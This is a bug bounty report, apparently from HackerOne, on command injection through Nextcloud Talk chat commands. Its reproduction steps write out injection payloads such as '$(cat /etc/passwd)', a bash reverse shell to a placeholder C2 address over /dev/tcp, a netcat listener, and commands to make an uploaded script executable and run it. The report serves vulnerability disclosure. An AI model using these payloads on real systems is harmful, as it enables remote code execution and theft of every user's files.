Lucene search

Covert-spectreH1:851807

HistoryApr 16, 2020 - 8:44 p.m.

Nextcloud: Code injection possible with malformed Nextcloud Talk chat commands

2020-04-1620:44:33

covert-spectre

hackerone.com

239

0.001 Low

EPSS

Percentile

46.0%

JSON

Summary

The Nextcloud Talk app allows system administrators to setup chat commands that can be executed in Talk using the “/command” syntax. Users can provide additional arguments to the commands, such as “/calc 1+1” or “/wiki Hello”, which are passed to the underlying script using @exec. If arguments are accepted, it is possible to trigger arbitrary code by wrapping the code in bash subcommand syntax /wiki test $(mycommand). This allows for arbitrary code execution, which an actor can use to spawn a reverse shell back from the remote machine.

Severity

This bug has been filed with a severity of Critical inline with the bounty impact/definition chart and the Nextcloud Threat Model as the bug allows both remote code execution via a non-admin user as well as access of complete user data of any other user.

Affected Versions

All versions that support Talk Commands appear to be affected as the bug is in the @execute command.
The following version were tested:

master-2020-04-15 via snap install nextcloud --edge, occ.status versionstring: 19.0.0 beta 2
17.0.5snap1 via snap install nextcloud, occ.status versionstring: 17.0.5

Repro Steps

Install and Setup Nextcloud
1. create Ubuntu 18.04 VM
2. install Nextcloud Server (Nextcloud Hub snap used for this test snap install nextcloud --edge)
3. run install command: nextcloud.manual-install "admin" "password"
4. generate self signed certificate nextcloud.enable-https self-signed
5. set trusted domains nextcloud.occ config:system:set trusted_domains 1 --value=<domain/ip>
6. create user alice
7. install and enable spreed/talk app
8. enable sample talk commands nextcloud.occ talk:command:add-samples
9. add calculator command as described in the documentation here
Setup C2 VM
1. kali used for this test, can be any host with netcat nc
2. run nc listener nc -l -p 8888
Create Shell Script > shell.sh
> This script can be anything that gets executed and returns a shell
> In this case, a simple reverse shell is initiated using bash interactive piping to /dev/tcp
> A php web shell, meterpreter binary or any other executable could be uploaded here
```
bash -i &gt;& /dev/tcp/&lt;c2-ip-here&gt;/8888 0&gt;&1 &
```
Log In As Alice and Upload File
1. upload above shell.sh to root directory of alice’s Nexcloud files
With Alice, start a Talk Conversation
Test Exploitability:
> Note, all commands appear to get successfully executed, however whether output is shown depends on the implementation of the backing script. For example, /wiki cannot show the results of cat /etc/passwd because the multiline output breaks the wiki script, but the calculator sample can show the output because it has an echo command in the scrpt.
```
/wiki test $(id)
/wiki test $(pwd)
/wiki test $(ls -al .)
/calc test $(cat /etc/passwd)
/calc test $(ls -al ../)
```
Execute Reverse Shell
1. Locate uploaded shell script
  1. For nextcloud snap, the data directory is defined here
  2. File locations are fixed, therefore, once the root directory is known, it is easy to derive the location of the script
  3. Can use /calc test $(ls ../) to explore directory structure
2. Enable execution of the script
3. Execute the script
```
/wiki test $(chmod +x /var/snap/nextcloud/common/nextcloud/data/alice/files/shell.sh)
/wiki test $(bash /var/snap/nextcloud/common/nextcloud/data/alice/files/shell.sh)
```
Observer C2 Listener for Connection

Run Commands via C2

id 
pwd
cd /var/snap/nextcloud/common/nextcloud/data/admin/files
ls -al
occ status

Attachments

See attached screenshots

Impact

Complete access to all user files
Shell access to occ
Shell access to host machine - root access if Nextcloud is running as root